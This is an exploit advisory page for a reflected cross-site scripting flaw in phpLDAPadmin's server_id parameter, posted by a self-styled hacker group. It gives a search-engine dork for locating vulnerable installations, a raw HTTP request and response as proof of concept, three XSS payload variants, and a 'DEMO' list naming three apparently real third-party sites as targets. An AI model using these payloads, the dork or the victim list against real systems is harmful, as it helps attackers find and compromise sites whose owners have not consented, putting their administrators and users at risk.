facebook facebook twitter rss

phpLDAPadmin Cross-site scripting (XSS)

Author: Rednofozi , Published: 27-09-2018
 ,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. by Rednofozi anonysec hackers iran ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
====================================================================================
# Exploit Title: phpLDAPadmin Cross-site scripting (XSS)
# Exploit Author: Rednofozi
# Date:26-09-2018
# Email: Rednofozi@yahoo.com
# Vendor Homepage: webmail.math.cnrs.fr/
# OUR SITE : https://anonysec.org/
|====================================================================================
# {INFO}
# xss Vulnerability
|====================================================================================
# {DORK}
# inurl:"admin.php?server_id="
|====================================================================================
# {POC}
#
GET /admin.php?server_id=%22%3E%3Cscript%3Ealert(%22Rednofozi]%22)%3C/script%3E HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=l89iuld37adri6s9krvum4n7q0
Connection: keep-alive
Upgrade-Insecure-Requests: 1

# Response:

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 2554
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=5, max=100
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Encoding: gzip



Parameter: Server_id Reflected (GET)

Location : admin.php

Payloads : server_id="><script>alert("Rednofozi:]")</script>
Or
server_id="><iframe/src=javascript:confirm(2)>X
Or
server_id="/><svg/onload=prompt(1)>


#
#
|====================================================================================
# {DEMO}
# 01: https://webmail.math.cnrs.fr/admin/index.php?server_id=0
# 02: https://ldap.medialight.com/admin/cmd.php?cmd=login_form&server_id=1
# 03: https://admin.serconi.es/phpldapadmin/cmd.php?cmd=login_form&server_id=2
# 04:
# 05:
# 06:
# 07:
# 08:
# 09:
# 10:
|====================================================================================
# {TNX For}
# >>> Thanks To: ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow
# >>> Discovered By :Rednofozi
|====================================================================================
The END ; Good Luck :D:D:D

Like us on Facebook :